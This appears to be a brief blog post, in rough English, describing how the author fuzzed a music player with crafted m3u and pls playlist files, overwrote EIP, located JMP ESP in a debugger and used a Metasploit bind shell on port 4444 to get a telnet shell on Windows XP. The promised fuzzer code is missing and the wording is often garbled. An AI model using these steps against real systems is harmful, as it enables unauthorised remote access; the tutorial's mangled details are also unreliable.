to break through the music application that can be done by creating a file in the form: ram, m3u and pls. here I will try to create a m3u file with the form (perl) and pls (python). as I try, it's easier to use than the m3u file pls shaped. such as the following example:
1. exploitdb open to find out how to penetrate an application.
2. try to exploit the results of searches in the database, such as:
3. exploid input results from the database, for in the form of a file fuzzing shaped (ram, m3u or pls). and played in the application file to create a file becomes corrupted and can be infiltrated. *26121 is file send to aplikasion, so aplikasion buffer overflow.
4. fuzzing run the file created earlier. and the file gets corrupted. EIP to 4141414 and EBX,ESP,EBP,ESI to AAAAAAAAA, marked corrupt application.
*EIP is process that will run next or go to the address.
*EIP is process that will run next or go to the address.
5. go to (/pentest/exploits/framework/tools).aaaaaaa file to change the language of 4141 and the EIP. and the attempt can be changed or not
6. Create a file fuzzing back of the above to be like this.
7. fuzzer run again - and the file gets corrupted and the file that had AAAAAA turned into letters and numbers changed in EIP
8. create a fuzzer that EIP into deed BEEF. as follows:
9. so it will look like below: *EIP :DEED BEE
10.trying to change the memory registers can be changed to CCC or not. the fuzzer as:
11. so memori register it will look like below : ccccccccc
12. search JMP ESP (open shell 32 to view ollydbg - klik - search JMP ESP)
13. change data into CC. by running the fuzzer below:
14. so data file it will look like below :CC
15. mark JMP ESP with toggle
16. open msfweb or metasploid web GUI.
17. to payload -> search win32 or windows xp -> search bind shell -> and contents as shown below, to get into telnet. port 4444
18. Create a file fuzzer from the results of search on web metasploid. as follows:
19. do execution fuzzer and do telnet to get into windows xp: successsssss
successfully perform the telnet. after I tried, with a combined experimental and 2 types of files. it worked in.
Tidak ada komentar:
Posting Komentar